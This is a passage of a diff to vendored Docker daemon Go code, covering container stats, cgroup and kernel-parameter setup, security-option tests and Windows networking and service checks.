copyBlkioEntry(stats.Blkio.IoServicedRecursive), + IoQueuedRecursive: copyBlkioEntry(stats.Blkio.IoQueuedRecursive), + IoServiceTimeRecursive: copyBlkioEntry(stats.Blkio.IoServiceTimeRecursive), + IoWaitTimeRecursive: 
copyBlkioEntry(stats.Blkio.IoWaitTimeRecursive), + IoMergedRecursive: copyBlkioEntry(stats.Blkio.IoMergedRecursive), + IoTimeRecursive: copyBlkioEntry(stats.Blkio.IoTimeRecursive), + SectorsRecursive: copyBlkioEntry(stats.Blkio.SectorsRecursive), + } + } + if stats.CPU != nil { s.CPUStats = types.CPUStats{ CPUUsage: types.CPUUsage{ - TotalUsage: cpu.CpuUsage.TotalUsage, - PercpuUsage: cpu.CpuUsage.PercpuUsage, - UsageInKernelmode: cpu.CpuUsage.UsageInKernelmode, - UsageInUsermode: cpu.CpuUsage.UsageInUsermode, + TotalUsage: stats.CPU.Usage.Total, + PercpuUsage: stats.CPU.Usage.PerCPU, + UsageInKernelmode: stats.CPU.Usage.Kernel, + UsageInUsermode: stats.CPU.Usage.User, }, ThrottlingData: types.ThrottlingData{ - Periods: cpu.ThrottlingData.Periods, - ThrottledPeriods: cpu.ThrottlingData.ThrottledPeriods, - ThrottledTime: cpu.ThrottlingData.ThrottledTime, + Periods: stats.CPU.Throttling.Periods, + ThrottledPeriods: stats.CPU.Throttling.ThrottledPeriods, + ThrottledTime: stats.CPU.Throttling.ThrottledTime, }, } - mem := cgs.MemoryStats.Usage - s.MemoryStats = types.MemoryStats{ - Usage: mem.Usage, - MaxUsage: mem.MaxUsage, - Stats: cgs.MemoryStats.Stats, - Failcnt: mem.Failcnt, - Limit: mem.Limit, + } + + if stats.Memory != nil { + raw := make(map[string]uint64) + raw["cache"] = stats.Memory.Cache + raw["rss"] = stats.Memory.RSS + raw["rss_huge"] = stats.Memory.RSSHuge + raw["mapped_file"] = stats.Memory.MappedFile + raw["dirty"] = stats.Memory.Dirty + raw["writeback"] = stats.Memory.Writeback + raw["pgpgin"] = stats.Memory.PgPgIn + raw["pgpgout"] = stats.Memory.PgPgOut + raw["pgfault"] = stats.Memory.PgFault + raw["pgmajfault"] = stats.Memory.PgMajFault + raw["inactive_anon"] = stats.Memory.InactiveAnon + raw["active_anon"] = stats.Memory.ActiveAnon + raw["inactive_file"] = stats.Memory.InactiveFile + raw["active_file"] = stats.Memory.ActiveFile + raw["unevictable"] = stats.Memory.Unevictable + raw["hierarchical_memory_limit"] = stats.Memory.HierarchicalMemoryLimit + 
raw["hierarchical_memsw_limit"] = stats.Memory.HierarchicalSwapLimit + raw["total_cache"] = stats.Memory.TotalCache + raw["total_rss"] = stats.Memory.TotalRSS + raw["total_rss_huge"] = stats.Memory.TotalRSSHuge + raw["total_mapped_file"] = stats.Memory.TotalMappedFile + raw["total_dirty"] = stats.Memory.TotalDirty + raw["total_writeback"] = stats.Memory.TotalWriteback + raw["total_pgpgin"] = stats.Memory.TotalPgPgIn + raw["total_pgpgout"] = stats.Memory.TotalPgPgOut + raw["total_pgfault"] = stats.Memory.TotalPgFault + raw["total_pgmajfault"] = stats.Memory.TotalPgMajFault + raw["total_inactive_anon"] = stats.Memory.TotalInactiveAnon + raw["total_active_anon"] = stats.Memory.TotalActiveAnon + raw["total_inactive_file"] = stats.Memory.TotalInactiveFile + raw["total_active_file"] = stats.Memory.TotalActiveFile + raw["total_unevictable"] = stats.Memory.TotalUnevictable + + if stats.Memory.Usage != nil { + s.MemoryStats = types.MemoryStats{ + Stats: raw, + Usage: stats.Memory.Usage.Usage, + MaxUsage: stats.Memory.Usage.Max, + Limit: stats.Memory.Usage.Limit, + Failcnt: stats.Memory.Usage.Failcnt, + } + } else { + s.MemoryStats = types.MemoryStats{ + Stats: raw, + } } + // if the container does not set memory limit, use the machineMemory - if mem.Limit > daemon.statsCollector.machineMemory && daemon.statsCollector.machineMemory > 0 { - s.MemoryStats.Limit = daemon.statsCollector.machineMemory - } - if cgs.PidsStats != nil { - s.PidsStats = types.PidsStats{ - Current: cgs.PidsStats.Current, - } + if s.MemoryStats.Limit > daemon.machineMemory && daemon.machineMemory > 0 { + s.MemoryStats.Limit = daemon.machineMemory } } - s.Read, err = ptypes.Timestamp(stats.Timestamp) - if err != nil { - return nil, err + + if stats.Pids != nil { + s.PidsStats = types.PidsStats{ + Current: stats.Pids.Current, + Limit: stats.Pids.Limit, + } } + return s, nil } @@ -1147,21 +1405,45 @@ func (daemon *Daemon) setDefaultIsolation() error { return nil } -func rootFSToAPIType(rootfs 
*image.RootFS) types.RootFS { - var layers []string - for _, l := range rootfs.DiffIDs { - layers = append(layers, l.String()) +// setupDaemonProcess sets various settings for the daemon's process +func setupDaemonProcess(config *config.Config) error { + // setup the daemons oom_score_adj + if err := setupOOMScoreAdj(config.OOMScoreAdjust); err != nil { + return err } - return types.RootFS{ - Type: rootfs.Type, - Layers: layers, + if err := setMayDetachMounts(); err != nil { + logrus.WithError(err).Warn("Could not set may_detach_mounts kernel parameter") } + return nil } -// setupDaemonProcess sets various settings for the daemon's process -func setupDaemonProcess(config *Config) error { - // setup the daemons oom_score_adj - return setupOOMScoreAdj(config.OOMScoreAdjust) +// This is used to allow removal of mountpoints that may be mounted in other +// namespaces on RHEL based kernels starting from RHEL 7.4. +// Without this setting, removals on these RHEL based kernels may fail with +// "device or resource busy". +// This setting is not available in upstream kernels as it is not configurable, +// but has been in the upstream kernels since 3.15. +func setMayDetachMounts() error { + f, err := os.OpenFile("/proc/sys/fs/may_detach_mounts", os.O_WRONLY, 0) + if err != nil { + if os.IsNotExist(err) { + return nil + } + return errors.Wrap(err, "error opening may_detach_mounts kernel config file") + } + defer f.Close() + + _, err = f.WriteString("1") + if os.IsPermission(err) { + // Setting may_detach_mounts does not work in an + // unprivileged container. Ignore the error, but log + // it if we appear not to be in that situation. 
+ if !rsystem.RunningInUserNS() { + logrus.Debugf("Permission denied writing %q to /proc/sys/fs/may_detach_mounts", "1") + } + return nil + } + return err } func setupOOMScoreAdj(score int) error { @@ -1169,7 +1451,7 @@ func setupOOMScoreAdj(score int) error { if err != nil { return err } - + defer f.Close() stringScore := strconv.Itoa(score) _, err = f.WriteString(stringScore) if os.IsPermission(err) { @@ -1181,7 +1463,7 @@ func setupOOMScoreAdj(score int) error { } return nil } - f.Close() + return err } @@ -1198,26 +1480,30 @@ func (daemon *Daemon) initCgroupsPath(path string) error { // for the period and runtime as this limits what the children can be set to. daemon.initCgroupsPath(filepath.Dir(path)) - _, root, err := cgroups.FindCgroupMountpointAndRoot("cpu") + mnt, root, err := cgroups.FindCgroupMountpointAndRoot("cpu") if err != nil { return err } + // When docker is run inside docker, the root is based of the host cgroup. + // Should this be handled in runc/libcontainer/cgroups ? 
+ if strings.HasPrefix(root, "/docker/") { + root = "/" + } - path = filepath.Join(root, path) + path = filepath.Join(mnt, root, path) sysinfo := sysinfo.New(true) - if sysinfo.CPURealtimePeriod && daemon.configStore.CPURealtimePeriod != 0 { - if err := os.MkdirAll(path, 0755); err != nil && !os.IsExist(err) { - return err - } - if err := ioutil.WriteFile(filepath.Join(path, "cpu.rt_period_us"), []byte(strconv.FormatInt(daemon.configStore.CPURealtimePeriod, 10)), 0700); err != nil { - return err - } + if err := maybeCreateCPURealTimeFile(sysinfo.CPURealtimePeriod, daemon.configStore.CPURealtimePeriod, "cpu.rt_period_us", path); err != nil { + return err } - if sysinfo.CPURealtimeRuntime && daemon.configStore.CPURealtimeRuntime != 0 { - if err := os.MkdirAll(path, 0755); err != nil && !os.IsExist(err) { + return maybeCreateCPURealTimeFile(sysinfo.CPURealtimeRuntime, daemon.configStore.CPURealtimeRuntime, "cpu.rt_runtime_us", path) +} + +func maybeCreateCPURealTimeFile(sysinfoPresent bool, configValue int64, file string, path string) error { + if sysinfoPresent && configValue != 0 { + if err := os.MkdirAll(path, 0755); err != nil { return err } - if err := ioutil.WriteFile(filepath.Join(path, "cpu.rt_runtime_us"), []byte(strconv.FormatInt(daemon.configStore.CPURealtimeRuntime, 10)), 0700); err != nil { + if err := ioutil.WriteFile(filepath.Join(path, file), []byte(strconv.FormatInt(configValue, 10)), 0700); err != nil { return err } } diff --git a/vendor/github.com/docker/docker/daemon/daemon_unix_test.go b/vendor/github.com/docker/docker/daemon/daemon_unix_test.go index 6250d359e3..36c6030988 100644 --- a/vendor/github.com/docker/docker/daemon/daemon_unix_test.go +++ b/vendor/github.com/docker/docker/daemon/daemon_unix_test.go @@ -1,21 +1,56 @@ -// +build !windows,!solaris +// +build !windows -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "errors" "io/ioutil" "os" - "path/filepath" "testing" containertypes 
"github.com/docker/docker/api/types/container" "github.com/docker/docker/container" - "github.com/docker/docker/volume" - "github.com/docker/docker/volume/drivers" - "github.com/docker/docker/volume/local" - "github.com/docker/docker/volume/store" + "github.com/docker/docker/daemon/config" ) +type fakeContainerGetter struct { + containers map[string]*container.Container +} + +func (f *fakeContainerGetter) GetContainer(cid string) (*container.Container, error) { + container, ok := f.containers[cid] + if !ok { + return nil, errors.New("container not found") + } + return container, nil +} + +// Unix test as uses settings which are not available on Windows +func TestAdjustSharedNamespaceContainerName(t *testing.T) { + fakeID := "abcdef1234567890" + hostConfig := &containertypes.HostConfig{ + IpcMode: containertypes.IpcMode("container:base"), + PidMode: containertypes.PidMode("container:base"), + NetworkMode: containertypes.NetworkMode("container:base"), + } + containerStore := &fakeContainerGetter{} + containerStore.containers = make(map[string]*container.Container) + containerStore.containers["base"] = &container.Container{ + ID: fakeID, + } + + adaptSharedNamespaceContainer(containerStore, hostConfig) + if hostConfig.IpcMode != containertypes.IpcMode("container:"+fakeID) { + t.Errorf("Expected IpcMode to be container:%s", fakeID) + } + if hostConfig.PidMode != containertypes.PidMode("container:"+fakeID) { + t.Errorf("Expected PidMode to be container:%s", fakeID) + } + if hostConfig.NetworkMode != containertypes.NetworkMode("container:"+fakeID) { + t.Errorf("Expected NetworkMode to be container:%s", fakeID) + } +} + // Unix test as uses settings which are not available on Windows func TestAdjustCPUShares(t *testing.T) { tmp, err := ioutil.TempDir("", "docker-daemon-unix-test-") @@ -179,10 +214,39 @@ func TestParseSecurityOpt(t *testing.T) { } } +func TestParseNNPSecurityOptions(t *testing.T) { + daemon := &Daemon{ + configStore: &config.Config{NoNewPrivileges: true}, 
+ } + container := &container.Container{} + config := &containertypes.HostConfig{} + + // test NNP when "daemon:true" and "no-new-privileges=false"" + config.SecurityOpt = []string{"no-new-privileges=false"} + + if err := daemon.parseSecurityOpt(container, config); err != nil { + t.Fatalf("Unexpected daemon.parseSecurityOpt error: %v", err) + } + if container.NoNewPrivileges { + t.Fatalf("container.NoNewPrivileges should be FALSE: %v", container.NoNewPrivileges) + } + + // test NNP when "daemon:false" and "no-new-privileges=true"" + daemon.configStore.NoNewPrivileges = false + config.SecurityOpt = []string{"no-new-privileges=true"} + + if err := daemon.parseSecurityOpt(container, config); err != nil { + t.Fatalf("Unexpected daemon.parseSecurityOpt error: %v", err) + } + if !container.NoNewPrivileges { + t.Fatalf("container.NoNewPrivileges should be TRUE: %v", container.NoNewPrivileges) + } +} + func TestNetworkOptions(t *testing.T) { daemon := &Daemon{} - dconfigCorrect := &Config{ - CommonConfig: CommonConfig{ + dconfigCorrect := &config.Config{ + CommonConfig: config.CommonConfig{ ClusterStore: "consul://localhost:8500", ClusterAdvertise: "192.168.0.1:8000", }, @@ -192,92 +256,13 @@ func TestNetworkOptions(t *testing.T) { t.Fatalf("Expect networkOptions success, got error: %v", err) } - dconfigWrong := &Config{ - CommonConfig: CommonConfig{ + dconfigWrong := &config.Config{ + CommonConfig: config.CommonConfig{ ClusterStore: "consul://localhost:8500://test://bbb", }, } if _, err := daemon.networkOptions(dconfigWrong, nil, nil); err == nil { - t.Fatalf("Expected networkOptions error, got nil") - } -} - -func TestMigratePre17Volumes(t *testing.T) { - rootDir, err := ioutil.TempDir("", "test-daemon-volumes") - if err != nil { - t.Fatal(err) - } - defer os.RemoveAll(rootDir) - - volumeRoot := filepath.Join(rootDir, "volumes") - err = os.MkdirAll(volumeRoot, 0755) - if err != nil { - t.Fatal(err) - } - - containerRoot := filepath.Join(rootDir, "containers") - cid := 
"1234" - err = os.MkdirAll(filepath.Join(containerRoot, cid), 0755) - - vid := "5678" - vfsPath := filepath.Join(rootDir, "vfs", "dir", vid) - err = os.MkdirAll(vfsPath, 0755) - if err != nil { - t.Fatal(err) - } - - config := []byte(` - { - "ID": "` + cid + `", - "Volumes": { - "/foo": "` + vfsPath + `", - "/bar": "/foo", - "/quux": "/quux" - }, - "VolumesRW": { - "/foo": true, - "/bar": true, - "/quux": false - } - } - `) - - volStore, err := store.New(volumeRoot) - if err != nil { - t.Fatal(err) - } - drv, err := local.New(volumeRoot, 0, 0) - if err != nil { - t.Fatal(err) - } - volumedrivers.Register(drv, volume.DefaultDriverName) - - daemon := &Daemon{root: rootDir, repository: containerRoot, volumes: volStore} - err = ioutil.WriteFile(filepath.Join(containerRoot, cid, "config.v2.json"), config, 600) - if err != nil { - t.Fatal(err) - } - c, err := daemon.load(cid) - if err != nil { - t.Fatal(err) - } - if err := daemon.verifyVolumesInfo(c); err != nil { - t.Fatal(err) - } - - expected := map[string]volume.MountPoint{ - "/foo": {Destination: "/foo", RW: true, Name: vid}, - "/bar": {Source: "/foo", Destination: "/bar", RW: true}, - "/quux": {Source: "/quux", Destination: "/quux", RW: false}, - } - for id, mp := range c.MountPoints { - x, exists := expected[id] - if !exists { - t.Fatal("volume not migrated") - } - if mp.Source != x.Source || mp.Destination != x.Destination || mp.RW != x.RW || mp.Name != x.Name { - t.Fatalf("got unexpected mountpoint, expected: %+v, got: %+v", x, mp) - } + t.Fatal("Expected networkOptions error, got nil") } } diff --git a/vendor/github.com/docker/docker/daemon/daemon_unsupported.go b/vendor/github.com/docker/docker/daemon/daemon_unsupported.go index cb1acf63d6..ee680b6411 100644 --- a/vendor/github.com/docker/docker/daemon/daemon_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/daemon_unsupported.go @@ -1,5 +1,5 @@ -// +build !linux,!freebsd,!windows,!solaris +// +build !linux,!freebsd,!windows -package daemon +package 
daemon // import "github.com/docker/docker/daemon" const platformSupported = false diff --git a/vendor/github.com/docker/docker/daemon/daemon_windows.go b/vendor/github.com/docker/docker/daemon/daemon_windows.go index 51ad68b357..1f801032df 100644 --- a/vendor/github.com/docker/docker/daemon/daemon_windows.go +++ b/vendor/github.com/docker/docker/daemon/daemon_windows.go @@ -1,16 +1,18 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" - "os" + "path/filepath" "strings" "github.com/Microsoft/hcsshim" - "github.com/Sirupsen/logrus" "github.com/docker/docker/api/types" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/container" - "github.com/docker/docker/image" + "github.com/docker/docker/daemon/config" + "github.com/docker/docker/pkg/containerfs" + "github.com/docker/docker/pkg/fileutils" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/parsers" "github.com/docker/docker/pkg/platform" @@ -23,8 +25,10 @@ import ( winlibnetwork "github.com/docker/libnetwork/drivers/windows" "github.com/docker/libnetwork/netlabel" "github.com/docker/libnetwork/options" - blkiodev "github.com/opencontainers/runc/libcontainer/configs" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" "golang.org/x/sys/windows" + "golang.org/x/sys/windows/svc/mgr" ) const ( @@ -34,34 +38,22 @@ const ( windowsMaxCPUShares = 10000 windowsMinCPUPercent = 1 windowsMaxCPUPercent = 100 - windowsMinCPUCount = 1 ) -func getBlkioWeightDevices(config *containertypes.HostConfig) ([]blkiodev.WeightDevice, error) { - return nil, nil +// Windows has no concept of an execution state directory. So use config.Root here. 
+func getPluginExecRoot(root string) string { + return filepath.Join(root, "plugins") } -func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error { - return nil -} - -func getBlkioReadIOpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) { - return nil, nil -} - -func getBlkioWriteIOpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) { - return nil, nil -} - -func getBlkioReadBpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) { - return nil, nil +func (daemon *Daemon) parseSecurityOpt(container *container.Container, hostConfig *containertypes.HostConfig) error { + return parseSecurityOpt(container, hostConfig) } -func getBlkioWriteBpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) { - return nil, nil +func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error { + return nil } -func (daemon *Daemon) getLayerInit() func(string) error { +func setupInitLayer(idMappings *idtools.IDMappings) func(containerfs.ContainerFS) error { return nil } @@ -85,7 +77,7 @@ func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConf func verifyContainerResources(resources *containertypes.Resources, isHyperv bool) ([]string, error) { warnings := []string{} - + fixMemorySwappiness(resources) if !isHyperv { // The processor resource controls are mutually exclusive on // Windows Server Containers, the order of precedence is @@ -132,6 +124,17 @@ func verifyContainerResources(resources *containertypes.Resources, isHyperv bool return warnings, fmt.Errorf("range of CPUs is from 0.01 to %d.00, as there are only %d CPUs available", sysinfo.NumCPU(), sysinfo.NumCPU()) } + osv := system.GetOSVersion() + if resources.NanoCPUs > 0 && isHyperv && osv.Build < 16175 { + leftoverNanoCPUs := resources.NanoCPUs % 1e9 + if leftoverNanoCPUs != 0 && resources.NanoCPUs > 1e9 { + resources.NanoCPUs = 
((resources.NanoCPUs + 1e9/2) / 1e9) * 1e9 + warningString := fmt.Sprintf("Your current OS version does not support Hyper-V containers with NanoCPUs greater than 1000000000 but not divisible by 1000000000. NanoCPUs rounded to %d", resources.NanoCPUs) + warnings = append(warnings, warningString) + logrus.Warn(warningString) + } + } + if len(resources.BlkioDeviceReadBps) > 0 { return warnings, fmt.Errorf("invalid option: Windows does not support BlkioDeviceReadBps") } @@ -171,7 +174,7 @@ func verifyContainerResources(resources *containertypes.Resources, isHyperv bool if resources.MemorySwap != 0 { return warnings, fmt.Errorf("invalid option: Windows does not support MemorySwap") } - if resources.MemorySwappiness != nil && *resources.MemorySwappiness != -1 { + if resources.MemorySwappiness != nil { return warnings, fmt.Errorf("invalid option: Windows does not support MemorySwappiness") } if resources.OomKillDisable != nil && *resources.OomKillDisable { @@ -192,7 +195,7 @@ func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes. warnings := []string{} hyperv := daemon.runAsHyperVContainer(hostConfig) - if !hyperv && system.IsWindowsClient() { + if !hyperv && system.IsWindowsClient() && !system.IsIoTCore() { // @engine maintainers. This block should not be removed. It partially enforces licensing // restrictions on Windows. Ping @jhowardmsft if there are concerns or PRs to change this. return warnings, fmt.Errorf("Windows client operating systems only support Hyper-V containers") @@ -200,19 +203,11 @@ func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes. w, err := verifyContainerResources(&hostConfig.Resources, hyperv) warnings = append(warnings, w...) 
- if err != nil { - return warnings, err - } - return warnings, nil -} - -// platformReload update configuration with platform specific options -func (daemon *Daemon) platformReload(config *Config) map[string]string { - return map[string]string{} + return warnings, err } // verifyDaemonSettings performs validation of daemon config struct -func verifyDaemonSettings(config *Config) error { +func verifyDaemonSettings(config *config.Config) error { return nil } @@ -230,22 +225,46 @@ func checkSystem() error { vmcompute := windows.NewLazySystemDLL("vmcompute.dll") if vmcompute.Load() != nil { - return fmt.Errorf("Failed to load vmcompute.dll. Ensure that the Containers role is installed.") + return fmt.Errorf("failed to load vmcompute.dll, ensure that the Containers feature is installed") + } + + // Ensure that the required Host Network Service and vmcompute services + // are running. Docker will fail in unexpected ways if this is not present. + var requiredServices = []string{"hns", "vmcompute"} + if err := ensureServicesInstalled(requiredServices); err != nil { + return errors.Wrap(err, "a required service is not installed, ensure the Containers feature is installed") + } + + return nil +} + +func ensureServicesInstalled(services []string) error { + m, err := mgr.Connect() + if err != nil { + return err + } + defer m.Disconnect() + for _, service := range services { + s, err := m.OpenService(service) + if err != nil { + return errors.Wrapf(err, "failed to open service %s", service) + } + s.Close() } return nil } // configureKernelSecuritySupport configures and validate security support for the kernel -func configureKernelSecuritySupport(config *Config, driverName string) error { +func configureKernelSecuritySupport(config *config.Config, driverName string) error { return nil } // configureMaxThreads sets the Go runtime max threads threshold -func configureMaxThreads(config *Config) error { +func configureMaxThreads(config *config.Config) error { return nil } -func 
(daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) { +func (daemon *Daemon) initNetworkController(config *config.Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) { netOptions, err := daemon.networkOptions(config, nil, nil) if err != nil { return nil, err @@ -304,6 +323,9 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[ // discover and add HNS networks to windows // network that exist are removed and added again for _, v := range hnsresponse { + if strings.ToLower(v.Type) == "private" { + continue // workaround for HNS reporting unsupported networks + } var n libnetwork.Network s := func(current libnetwork.Network) bool { options := current.Info().DriverOptions() @@ -315,6 +337,9 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[ } controller.WalkNetworks(s) + + drvOptions := make(map[string]string) + if n != nil { // global networks should not be deleted by local HNS if n.Info().Scope() == datastore.GlobalScope { @@ -323,14 +348,23 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[ v.Name = n.Name() // This will not cause network delete from HNS as the network // is not yet populated in the libnetwork windows driver + + // restore option if it existed before + drvOptions = n.Info().DriverOptions() n.Delete() } - netOption := map[string]string{ winlibnetwork.NetworkName: v.Name, winlibnetwork.HNSID: v.Id, } + // add persisted driver options + for k, v := range drvOptions { + if k != winlibnetwork.NetworkName && k != winlibnetwork.HNSID { + netOption[k] = v + } + } + v4Conf := []*libnetwork.IpamConf{} for _, subnet := range v.Subnets { ipamV4Conf := libnetwork.IpamConf{} @@ -342,8 +376,10 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[ name := v.Name // If there is no nat network create one from the first NAT 
network - // encountered - if !defaultNetworkExists && runconfig.DefaultDaemonNetworkMode() == containertypes.NetworkMode(strings.ToLower(v.Type)) { + // encountered if it doesn't already exist + if !defaultNetworkExists && + runconfig.DefaultDaemonNetworkMode() == containertypes.NetworkMode(strings.ToLower(v.Type)) && + n == nil { name = runconfig.DefaultDaemonNetworkMode().NetworkName() defaultNetworkExists = true } @@ -371,7 +407,7 @@ func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[ return controller, nil } -func initBridgeDriver(controller libnetwork.NetworkController, config *Config) error { +func initBridgeDriver(controller libnetwork.NetworkController, config *config.Config) error { if _, err := controller.NetworkByName(runconfig.DefaultDaemonNetworkMode().NetworkName()); err == nil { return nil } @@ -383,8 +419,8 @@ func initBridgeDriver(controller libnetwork.NetworkController, config *Config) e var ipamOption libnetwork.NetworkOption var subnetPrefix string - if config.bridgeConfig.FixedCIDR != "" { - subnetPrefix = config.bridgeConfig.FixedCIDR + if config.BridgeConfig.FixedCIDR != "" { + subnetPrefix = config.BridgeConfig.FixedCIDR } else { // TP5 doesn't support properly detecting subnet osv := system.GetOSVersion() @@ -429,14 +465,14 @@ func (daemon *Daemon) cleanupMounts() error { return nil } -func setupRemappedRoot(config *Config) ([]idtools.IDMap, []idtools.IDMap, error) { - return nil, nil, nil +func setupRemappedRoot(config *config.Config) (*idtools.IDMappings, error) { + return &idtools.IDMappings{}, nil } -func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error { +func setupDaemonRoot(config *config.Config, rootDir string, rootIDs idtools.IDPair) error { config.Root = rootDir // Create the root directory if it doesn't exists - if err := system.MkdirAllWithACL(config.Root, 0); err != nil && !os.IsExist(err) { + if err := system.MkdirAllWithACL(config.Root, 0, 
system.SddlAdministratorsLocalSystem); err != nil { return err } return nil @@ -457,7 +493,14 @@ func (daemon *Daemon) runAsHyperVContainer(hostConfig *containertypes.HostConfig // conditionalMountOnStart is a platform specific helper function during the // container start to call mount. func (daemon *Daemon) conditionalMountOnStart(container *container.Container) error { - // We do not mount if a Hyper-V container + // Bail out now for Linux containers. We cannot mount the containers filesystem on the + // host as it is a non-Windows filesystem. + if system.LCOWSupported() && container.OS != "windows" { + return nil + } + + // We do not mount if a Hyper-V container as it needs to be mounted inside the + // utility VM, not the host. if !daemon.runAsHyperVContainer(container.HostConfig) { return daemon.Mount(container) } @@ -467,6 +510,11 @@ func (daemon *Daemon) conditionalMountOnStart(container *container.Container) er // conditionalUnmountOnCleanup is a platform specific helper function called // during the cleanup of a container to unmount. 
func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container) error { + // Bail out now for Linux containers + if system.LCOWSupported() && container.OS != "windows" { + return nil + } + // We do not unmount if a Hyper-V container if !daemon.runAsHyperVContainer(container.HostConfig) { return daemon.Unmount(container) @@ -474,66 +522,68 @@ func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container return nil } -func driverOptions(config *Config) []nwconfig.Option { +func driverOptions(config *config.Config) []nwconfig.Option { return []nwconfig.Option{} } func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) { if !c.IsRunning() { - return nil, errNotRunning{c.ID} + return nil, errNotRunning(c.ID) } // Obtain the stats from HCS via libcontainerd - stats, err := daemon.containerd.Stats(c.ID) + stats, err := daemon.containerd.Stats(context.Background(), c.ID) if err != nil { + if strings.Contains(err.Error(), "container not found") { + return nil, containerNotFound(c.ID) + } return nil, err } // Start with an empty structure s := &types.StatsJSON{} + s.Stats.Read = stats.Read + s.Stats.NumProcs = platform.NumProcs() - // Populate the CPU/processor statistics - s.CPUStats = types.CPUStats{ - CPUUsage: types.CPUUsage{ - TotalUsage: stats.Processor.TotalRuntime100ns, - UsageInKernelmode: stats.Processor.RuntimeKernel100ns, - UsageInUsermode: stats.Processor.RuntimeKernel100ns, - }, - } - - // Populate the memory statistics - s.MemoryStats = types.MemoryStats{ - Commit: stats.Memory.UsageCommitBytes, - CommitPeak: stats.Memory.UsageCommitPeakBytes, - PrivateWorkingSet: stats.Memory.UsagePrivateWorkingSetBytes, - } - - // Populate the storage statistics - s.StorageStats = types.StorageStats{ - ReadCountNormalized: stats.Storage.ReadCountNormalized, - ReadSizeBytes: stats.Storage.ReadSizeBytes, - WriteCountNormalized: stats.Storage.WriteCountNormalized, - WriteSizeBytes: stats.Storage.WriteSizeBytes, - } - - 
// Populate the network statistics - s.Networks = make(map[string]types.NetworkStats) - - for _, nstats := range stats.Network { - s.Networks[nstats.EndpointId] = types.NetworkStats{ - RxBytes: nstats.BytesReceived, - RxPackets: nstats.PacketsReceived, - RxDropped: nstats.DroppedPacketsIncoming, - TxBytes: nstats.BytesSent, - TxPackets: nstats.PacketsSent, - TxDropped: nstats.DroppedPacketsOutgoing, + if stats.HCSStats != nil { + hcss := stats.HCSStats + // Populate the CPU/processor statistics + s.CPUStats = types.CPUStats{ + CPUUsage: types.CPUUsage{ + TotalUsage: hcss.Processor.TotalRuntime100ns, + UsageInKernelmode: hcss.Processor.RuntimeKernel100ns, + UsageInUsermode: hcss.Processor.RuntimeKernel100ns, + }, } - } - // Set the timestamp - s.Stats.Read = stats.Timestamp - s.Stats.NumProcs = platform.NumProcs() + // Populate the memory statistics + s.MemoryStats = types.MemoryStats{ + Commit: hcss.Memory.UsageCommitBytes, + CommitPeak: hcss.Memory.UsageCommitPeakBytes, + PrivateWorkingSet: hcss.Memory.UsagePrivateWorkingSetBytes, + } + + // Populate the storage statistics + s.StorageStats = types.StorageStats{ + ReadCountNormalized: hcss.Storage.ReadCountNormalized, + ReadSizeBytes: hcss.Storage.ReadSizeBytes, + WriteCountNormalized: hcss.Storage.WriteCountNormalized, + WriteSizeBytes: hcss.Storage.WriteSizeBytes, + } + // Populate the network statistics + s.Networks = make(map[string]types.NetworkStats) + for _, nstats := range hcss.Network { + s.Networks[nstats.EndpointId] = types.NetworkStats{ + RxBytes: nstats.BytesReceived, + RxPackets: nstats.PacketsReceived, + RxDropped: nstats.DroppedPacketsIncoming, + TxBytes: nstats.BytesSent, + TxPackets: nstats.PacketsSent, + TxDropped: nstats.DroppedPacketsOutgoing, + } + } + } return s, nil } @@ -541,8 +591,9 @@ func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) { // daemon to run in. 
This is only applicable on Windows func (daemon *Daemon) setDefaultIsolation() error { daemon.defaultIsolation = containertypes.Isolation("process") - // On client SKUs, default to Hyper-V - if system.IsWindowsClient() { + // On client SKUs, default to Hyper-V. Note that IoT reports as a client SKU + // but it should not be treated as such. + if system.IsWindowsClient() && !system.IsIoTCore() { daemon.defaultIsolation = containertypes.Isolation("hyperv") } for _, option := range daemon.configStore.ExecOptions { @@ -561,7 +612,7 @@ func (daemon *Daemon) setDefaultIsolation() error { daemon.defaultIsolation = containertypes.Isolation("hyperv") } if containertypes.Isolation(val).IsProcess() { - if system.IsWindowsClient() { + if system.IsWindowsClient() && !system.IsIoTCore() { // @engine maintainers. This block should not be removed. It partially enforces licensing // restrictions on Windows. Ping @jhowardmsft if there are concerns or PRs to change this. return fmt.Errorf("Windows client operating systems only support Hyper-V containers") @@ -577,28 +628,28 @@ func (daemon *Daemon) setDefaultIsolation() error { return nil } -func rootFSToAPIType(rootfs *image.RootFS) types.RootFS { - var layers []string - for _, l := range rootfs.DiffIDs { - layers = append(layers, l.String()) - } - return types.RootFS{ - Type: rootfs.Type, - Layers: layers, - } +func setupDaemonProcess(config *config.Config) error { + return nil } -func setupDaemonProcess(config *Config) error { +func (daemon *Daemon) setupSeccompProfile() error { return nil } -// verifyVolumesInfo is a no-op on windows. -// This is called during daemon initialization to migrate volumes from pre-1.7. 
